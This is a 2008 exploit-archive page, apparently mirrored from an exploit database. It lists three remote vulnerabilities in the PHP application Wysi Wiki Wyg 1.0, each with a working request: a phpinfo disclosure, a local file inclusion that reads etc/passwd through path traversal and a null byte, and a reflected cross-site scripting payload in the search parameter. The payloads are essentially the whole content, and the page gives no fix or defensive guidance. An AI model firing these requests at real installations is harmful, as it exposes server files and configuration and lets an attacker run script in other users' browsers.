[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Wysi Wiki Wyg 1.0 (LFI/XSS/PHPInfo) Remote Vulnerabilities
# Published : 2008-10-20
# Author : StAkeR
# Previous Title : ShopMaker 1.0 (product.php id) Remote SQL Injection Vulnerability
# Next Title : WBB Plugin rGallery 1.09 (itemID) Blind SQL Injection Exploit


/*
   
   Wysi Wiki Wyg 1.0 (LFI,XSS,PHPInfo) Remote Vulnerabilities
   ----------------------------------------------------------
   By StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/wysiwikiwyg10.zip
   ----------------------------------------------------------

  1- PHPInfo Disclosure 
  -  index.php?categup=isset
  
  2- Local File Inclusion (LFI) (MQ Off)
  -  index.php?c=../../../&a=etc/passwd%00
  
  3- Cross Site Scripting (XSS)
  -  index.php?c=wikiwizi&a=recherche&s=<script>[Javascript]</script>



*/

# www.Syue.com [2008-10-20]